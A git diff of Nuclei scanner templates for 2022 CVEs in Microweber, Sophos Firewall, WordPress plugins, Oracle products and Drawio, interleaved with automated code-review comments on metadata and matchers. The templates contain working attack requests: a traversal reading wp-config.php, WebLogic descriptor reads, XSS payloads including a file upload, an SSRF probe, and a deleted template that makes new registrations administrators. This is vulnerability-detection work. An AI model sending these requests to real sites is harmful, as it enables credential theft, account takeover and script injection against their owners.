@@ -1,26 +1,37 @@ id: CVE-2022-0660 info: - name: Microweber < 1.2.11 - Information Disclosure + name: Microweber <1.2.11 - Information Disclosure author: amit-jd severity: high description: | - Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11. + Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ - https://github.com/advisories/GHSA-hhrj-wp42-32v3 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 + - https://github.com/microweber/microweber/commit/2417bd2eda2aa2868c1dad1abf62341f22bfc20a classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 + epss-score: 0.00719 + epss-percentile: 0.78502 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2022,microweber,disclosure,authenticated,huntr,cve + verified: true + max-request: 2 + vendor: microweber + product: microweber + tags: cve,cve2022,microweber,disclosure,authenticated,huntr -requests: +http: - raw: - | POST /api/user_login HTTP/1.1 @@ -28,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /module/ HTTP/1.1 Host: {{Hostname}} 
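Review bot: The rewritten `description:` in the first hunk now says an attacker can "modify data, and/or execute unauthorized operations", but the unchanged `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` and `cwe-id: CWE-209` describe a pure confidentiality impact from an error message; the added sentence overstates the finding and should be dropped or reduced to information disclosure. The same boilerplate sentence is added to the CVE-2022-1815 description (the hunk starting at `@@ -1,26 +1,37 @@ id: CVE-2022-1815`), whose vector is likewise `C:H/I:N/A:N`. The `reference:` list in this hunk also still carries the same huntr bounty twice, with and without a trailing slash.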
@@ -37,14 +47,13 @@ requests: class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - contains(body_2,'QueryException') - contains(body_2,'SQLSTATE') - contains(body_2,'runQueryCallback') - - 'contains(all_headers_2,"text/html")' + - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and +# digest: 490a00463044022006a6184e06a8bb2508ed86a39022ab8f8c89e52a6ee6b736be84fd8c1f355090022005d2a535f86a1e140b49cf1e94f2d5e08b7016c64e11b0a5ae67908a74aa59d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0952.yaml b/nuclei-templates/CVE-2022/cve-2022-0952.yaml deleted file mode 100644 index c51d27c117..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0952.yaml +++ /dev/null 
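Review bot: The last hunk deletes `cookie-reuse: true` from a two-request flow whose second request (`POST /module/`) depends on the session set by `POST /api/user_login`, so correctness now relies on the engine carrying cookies between requests by default; if that is the intended behaviour of the newer template format, a comment such as `# the login session cookie is reused by the second request under the default cookie handling` on the `raw:` block would save the next reader from re-checking. The change from `all_headers_2` to `header_2` keeps the `text/html` check, so the three `contains(body_2, ...)` lines plus `status_code_2==500` remain the actual signal for the SQL error disclosure. The `raw:` block itself starts in the first hunk of this file.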
@@ -1,52 +0,0 @@ -id: CVE-2022-0952 - -info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update - author: random-robbie - severity: high - description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin - reference: - - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0952 - cwe-id: CWE-862 - metadata: - verified: "true" - tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress - -requests: - - raw: - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"1"} - - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"default_role":"administrator"} - - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"0"} - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "application/json")' - - "status_code == 200" - - "contains(body_1, 'users_can_register')" - - "contains(body_2, 'default_role')" - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0963.yaml b/nuclei-templates/CVE-2022/cve-2022-0963.yaml deleted file mode 100644 index 5a03cfe931..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0963.yaml +++ /dev/null 
@@ -1,71 +0,0 @@ -id: CVE-2022-0963 - -info: - name: Microweber <1.2.12 - Stored Cross-Site Scripting - author: amit-jd - severity: medium - description: | - Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. - reference: - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ - - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c - - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0963 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /plupload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 - Referer: {{BaseURL}}admin/view:modules/load_module:files - - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="name" - - {{randstr}}.xml - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunk" - - 0 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunks" - - 1 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="file"; filename="blob" - Content-Type: application/octet-stream - - alert(document.domain) - -----------------------------59866212126262636974202255034-- - - - | - GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 
'contains(body_3,"alert(document.domain)")' - - 'status_code_3==200' - - 'contains(body_2,"bytes_uploaded")' - condition: and - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1020.yaml b/nuclei-templates/CVE-2022/cve-2022-1020.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-1020.yaml rename to nuclei-templates/CVE-2022/cve-2022-1020.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-1040.yaml b/nuclei-templates/CVE-2022/cve-2022-1040.yaml new file mode 100644 index 0000000000..e304c7bb7c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1040.yaml 
@@ -0,0 +1,58 @@ +id: CVE-2022-1040 + +info: + name: Sophos Firewall <=18.5 MR3 - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall. + remediation: | + Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability. + reference: + - https://github.com/killvxk/CVE-2022-1040 + - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker + - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce + - https://github.com/Mr-xn/Penetration_Testing_POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1040 + cwe-id: CWE-287 + epss-score: 0.97434 + epss-percentile: 0.99939 + cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sophos + product: sfos + shodan-query: http.title:"Sophos" + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev + +http: + - method: POST + path: + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + + headers: + X-Requested-With: "XMLHttpRequest" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{\"status\":\"Session Expired\"}" + + - type: word + part: header + words: + - "Server: xxxx" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f080aa3d8834e42afae528c892504c545864a4171a3a9942ab2a67b241c8cfc40220077fa609e7ee21031571a5fa2ca2d814a59157fd47ce39dc7ba4e6310900f35f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
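Review bot: The `matchers:` in the new file key on `{"status":"Session Expired"}`, a `Server: xxxx` header and HTTP 200 from an unauthenticated `POST /userportal/Controller?...`, which is a behavioural fingerprint of an unpatched build rather than evidence of code execution; the `name:` "Remote Code Execution" and the `impact:` text should make clear that a match means the hotfix appears not to be applied and needs confirmation against the Sophos advisory in `reference:`. A short comment above `matchers:` such as `# a 200 'Session Expired' reply to this malformed JSON request indicates a build without the hotfix — confirm against sophos-sa-20220325` would document why this response is the signal. The `https://github.com/Mr-xn/Penetration_Testing_POC` entry is a generic PoC collection rather than a source for this CVE and could be dropped.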
diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml index 2e0ecf66e8..1deaf81022 100644 --- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-1119.yaml @@ -6,26 +6,38 @@ info: severity: high description: | WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. + remediation: | + Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1119 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress + epss-score: 0.42222 + epss-percentile: 0.97228 + cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: simplefilelist + product: simple-file-list + framework: wordpress + tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" matchers-condition: and matchers: - - type: word part: body words: 
@@ -36,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/29 +# digest: 4a0a00473045022100b1c39b9ee69004af99081759b453e9aaa588196617ca9d9d1e49abca87f79a4f022061ba2a637e812dfee7d8b615755dc6e16e41b5980d3569c3b6eab3232a4954c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml new file mode 100644 index 0000000000..81f38e8525 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1392.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2022-1392 + +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + cwe-id: CWE-22 + epss-score: 0.01867 + epss-percentile: 0.87073 + cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: commoninja + product: videos_sync_pdf + framework: wordpress + tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022024a5506a3c00727ecfc4753913791b663aef57c426625d115e2bcbb557846a1f022100834c702542a6c6510bbec672cea1f477413753a349dbcd230b21b6e9c4daaaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
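Review bot: The body matcher in the new file looks for the lowercase string `"failed to open stream: No such file or directory"`, but PHP 8 capitalised that warning to "Failed to open stream", and `word` matchers are case-sensitive unless told otherwise, so hosts running the plugin on PHP 8 will be missed. Adding `case-insensitive: true` to that matcher, or matching on the second word alone (`REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php`, the plugin-specific part), keeps the check working across PHP versions. A comment noting that the match depends on PHP warnings being displayed in the response would also explain why hardened hosts produce no hit despite running the affected version.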
diff --git a/nuclei-templates/CVE-2022/cve-2022-1439.yaml b/nuclei-templates/CVE-2022/cve-2022-1439.yaml
new file mode 100644
index 0000000000..132e36833a
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-1439.yaml
@@ -0,0 +1,50 @@ +id: CVE-2022-1439 + +info: + name: Microweber <1.2.15 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + reference: + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 + - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1439 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,xss,huntr + +http: + - method: GET + path: + - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "
alert(document.domain)",' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d284104de93b182d1704a792bdf51e256d3094c1c311c2b37ffe0b17d2f0cca302201543cd23a6fba386172040ad3430e6f03070f718e8061c3f2cf052e653f69edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1815.yaml b/nuclei-templates/CVE-2022/cve-2022-1815.yaml index f7a27e1593..4a3bd44221 100644 --- a/nuclei-templates/CVE-2022/cve-2022-1815.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-1815.yaml 
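Review bot: `reference:` in the new file lists the same huntr bounty twice, `https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/` and the same URL without the trailing slash; keep one. The body matcher word appears truncated on this page (`alert(document.domain)",'`), so the exact expected reflection should be checked in the committed file; if it is only the bare payload fragment, matching it together with the surrounding reflected `module=` context is a safer signal than the fragment alone.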
@@ -1,26 +1,37 @@ id: CVE-2022-1815 info: - name: Drawio < 18.1.2 - Server Side Request Forgery + name: Drawio <18.1.2 - Server-Side Request Forgery author: amit-jd severity: high description: | - SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. + Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. + remediation: | + Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1815 - cwe-id: CWE-918 + cwe-id: CWE-918,CWE-200 + epss-score: 0.02327 + epss-percentile: 0.89496 + cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph + verified: true + max-request: 1 + vendor: diagrams + product: drawio + tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams -requests: +http: - raw: - | GET /service/0/test.oast.me HTTP/2 
@@ -32,3 +43,4 @@ requests: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and +# digest: 4b0a004830460221009f35d80f39006377b499e7582c11b749772582ca4778c993f70157a0094e4bf4022100bb90c3f428c55557012fa9b0accf22af9f738541f92fb8a086a73427e971ad1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1904.yaml b/nuclei-templates/CVE-2022/cve-2022-1904.yaml deleted file mode 100644 index 37cac91201..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1904.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-1904 - -info: - name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting - author: Akincibor - severity: medium - description: | - WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1904 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - ' - Color' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1906.yaml b/nuclei-templates/CVE-2022/cve-2022-1906.yaml deleted file mode 100644 index 0cf1efbc16..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1906.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2022-1906 - -info: - name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting - author: random-robbie - severity: medium - description: | - WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1906 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 - -requests: - - raw: - - | - GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "got message " - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml new file mode 100644 index 0000000000..d9160b01fe --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21371.yaml 
@@ -0,0 +1,64 @@ +id: CVE-2022-21371 + +info: + name: Oracle WebLogic Server Local File Inclusion + author: paradessia,narluin + severity: high + description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + impact: | + An attacker can read sensitive files containing credentials, configuration details, or other sensitive information. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. + reference: + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 + - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 + - http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html + - https://github.com/Mr-xn/CVE-2022-21371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21371 + cwe-id: CWE-22 + epss-score: 0.96287 + epss-percentile: 0.9943 + cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: oracle + product: weblogic_server + tags: cve,cve2022,lfi,weblogic,oracle,packetstorm + +http: + - method: GET + raw: + - |+ + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - .//WEB-INF/weblogic.xml + - .//WEB-INF/web.xml + + stop-at-first-match: true + unsafe: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(body, "")' + condition: or + + - type: dsl + dsl: + - 'contains(header, "text/xml")' + - 'contains(header, "application/xml")' + condition: or + + - type: status + status: + - 200 +# digest: 
4a0a0047304502201b66dcd3b9fc90c4fd5587d8c4311347fa46f77f7ba6b467dc8f9e93550decd40221008a2c7b052f8c872b04c9422b81c00210ace794722fb697ee8b61866818625acd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml
new file mode 100644
index 0000000000..578dc0e7cb
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-21500.yaml
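Review bot: Both body checks in the first `dsl` matcher appear as `contains(body, "")`, which is true for every response and would let the matcher pass on any 200 with an XML content type; if the committed file really carries empty strings this is a false-positive generator, and if markup was lost in rendering, the expected element names should be verified in the repository. The `- method: GET` key alongside `raw:` is redundant, because the raw request already states its method. The `cpe` pins `12.1.3.0.0` although the description lists four affected versions; a wildcard version would keep classification and description consistent.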
@@ -0,0 +1,56 @@ +id: CVE-2022-21500 + +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess,0xpugazh + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. + remediation: | + Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + epss-score: 0.92631 + epss-percentile: 0.98947 + cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: oracle + product: e-business_suite + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: cve,cve2022,oracle,misconfig,auth-bypass + +http: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' + + stop-at-first-match: true + + matchers-condition: and 
+ matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21705.yaml b/nuclei-templates/CVE-2022/cve-2022-21705.yaml deleted file mode 100644 index 1e09625694..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21705.yaml +++ /dev/null 
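Review bot: The third `words` entry of the body matcher is `- ''`, an empty string under `condition: and`, which matches every body and adds nothing to the check (or, if a tag was stripped in rendering, the intended marker should be restored). With only `Registration` and `Register as individual` left, the template confirms that a self-registration page is reachable rather than an actual bypass, so a comment such as `# detects an exposed self-registration page; confirm exploitability manually` above `matchers:` would set expectations for triage. `classification` has no `cwe-id`, unlike the other new templates in this commit; the value should be taken from NVD. The `misconfig` tag sits oddly on a CVE template and duplicates what `auth-bypass` already conveys.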
